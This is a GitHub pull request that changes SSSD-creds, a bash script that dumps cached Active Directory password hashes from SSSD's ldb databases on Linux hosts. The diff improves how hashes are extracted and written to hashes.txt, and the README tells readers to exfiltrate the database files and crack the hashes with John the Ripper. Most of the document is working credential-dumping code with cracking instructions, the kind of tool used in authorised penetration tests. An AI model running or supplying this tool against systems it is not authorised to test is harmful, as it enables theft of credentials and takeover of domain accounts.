### PR TITLE
Fixing troubles on hash identification and hash 

### DIFF
--- a/README.md
+++ b/README.md
@@ -1,19 +1,20 @@
 # SSSD-creds
 
-Using this bash script it is possible to extract Active Directory accounts hashes when credential caching is enabled in SSSD.
+Using this bash script, it's possible to extract hashed passwords for Active Directory accounts (of the form SHA-512) when credential caching is enabled in SSSD.
 
 ```
 bash analyze.sh [$path]
 ```
 
-Without input arguments it takes the SSSD default path "/var/lib/sss/db/" but you can use a different one. If tdbdump is not installed it just lists the ldb files which contain the hashes, you can install it ("apt install tdb-tools") or exfiltrate these files:
+Without arguments it takes the default SSSD path "/var/lib/sss/db/" but you can use a different one. If tdbdump is not installed it just lists the ldb files which contain the hashes, you can install it ("apt install tdb-tools") or exfiltrate these files:
 
-![image1](https://raw.githubusercontent.com/ricardojoserf/ricardojoserf.github.io/master/images/SSSD-creds/image1.png)
+![image1](https://github.com/4zrm/SSSD-creds/assets/136485331/46ab92f8-1a60-4f4c-bdf5-2f419192dd90)
 
 
 In a system with tdbdump installed the script extracts the cached accounts and hashes, dumping the results to the file "hashes.txt"
 
-![image2](https://raw.githubusercontent.com/ricardojoserf/ricardojoserf.github.io/master/images/SSSD-creds/image2.png)
+![image2](https://github.com/4zrm/SSSD-creds/assets/136485331/0711efe4-a1a4-47c8-8dac-5d8d349dfc0c)
+![image3](https://github.com/4zrm/SSSD-creds/assets/136485331/57660866-bd17-455d-bae9-22b798ac86f1)
 
 The hashes can then be cracked using Hashcat or John the Ripper:
 
@@ -21,7 +22,12 @@ The hashes can then be cracked using Hashcat or John the Ripper:
 john hashes.txt --format=sha512crypt
 ```
 
-![image3](https://raw.githubusercontent.com/ricardojoserf/ricardojoserf.github.io/master/images/SSSD-creds/image3.png)
+![image4](https://github.com/4zrm/SSSD-creds/assets/136485331/f8bcc14b-85ec-4a5a-bd43-b011882a6893)
+
+Here, all hashes have been cracked, but some of them have been cracked before.
+However, it's possible to see all cracked passwords with **--show** option.
+
+![image5](https://github.com/4zrm/SSSD-creds/assets/136485331/4e1f485c-4a7d-49d8-810e-09eac7895c92)
 
 
 ### Sources

--- a/analyze.sh
+++ b/analyze.sh
@@ -14,19 +14,22 @@ else
 	echo ""
 fi
 
-for db_ in $(ls $location_/cache_*ldb)
+for db_ in $(ls $location_/*ldb)
 do
-	echo "Database file:" $(echo $db_)
+	echo ""
 	if [ "$analyze" -eq "1" ]; then
-		echo "Account hashes: " $(tdbdump $db_ | grep cachedPassword | cut -d "=" -f 3 | cut -d "," -f 1 | sort -u | wc -l)
+		number_of_accounts=$(tdbdump $db_ | grep cachedPassword | cut -d "=" -f 3 | cut -d "," -f 1 | sort -u | wc -l)
+		echo "\e[1;36m### $number_of_accounts hash found in $db_ ###\e[0m"
 		for account_ in $(tdbdump $db_ | grep cachedPassword | cut -d "=" -f 3 | cut -d "," -f 1 | sort -u)
-		do 
-			echo "Account: " $account_
-			hash_="\$6\$"$(tdbdump $db_ | grep cachedPassword | grep $account_ | tr "=" "\n" | grep cachedPassword | sed "s/\\\00g//g" | sed 's/\\00//g' | sed 's/\\01//g' | awk -F 'cachedPassword' '{print $3}' | awk -F 'lastCachedPasswordChange' '{print $1 }')
-			echo "Hash:    " $hash_
-			echo "Adding hash to hashes.txt"
+		do
+			echo "\nAccount:	\e[1;32m$account_\e[0m"
+			hash_=$(tdbdump $db_ | grep cachedPassword | grep $account_ | grep -o "\$6\$.*achedPassword" | awk -F 'Type' '{print $1}' | awk -F 'cachedPassword' '{print $1}' | awk -F 'lastCachedPassword' '{print $1}')
+			echo "Hash:		\e[1;31m$hash_\e[0m"
 			echo $account_:$hash_ >> hashes.txt
 		done
-		echo ""
+		if [ "$number_of_accounts" -gt "0" ]; then
+			echo "\n\e[1m  =====> Adding $db_ hashes to hashes.txt <=====\e[0m\n"
+		fi
 	fi
 done
+echo ""


### PR DESCRIPTION
## Description
Hash detection could fail in some cases, leading to the display of "Type1" or only "$6$.
In addition, for correctly identified hashes, their display and writing in the hashes.txt file was incorrect (addition of the term "**$6$j**").
I've also made the script output more readable.

### Original
![Pasted image 20230614115504](https://github.com/ricardojoserf/SSSD-creds/assets/136485331/9e62a219-ace0-4aca-aa61-74bfde2fdb0b)
![image](https://github.com/ricardojoserf/SSSD-creds/assets/136485331/2449b0d3-4f48-4f8d-9f0b-4edd13f0d2df)

### Now
![Pasted image 20230614095245](https://github.com/ricardojoserf/SSSD-creds/assets/136485331/4ee5c733-c517-4595-906c-e7b1148c1309)
![Pasted image 20230614121446](https://github.com/ricardojoserf/SSSD-creds/assets/136485331/823dc387-2236-4bd9-8232-210efb65a0f2)


## Proposed Changes
  - Output clarification
  - Reading of all .ldb databases in the folder
  - Managing the term "Type" and other terms with awk
  - Using grep to match hashes



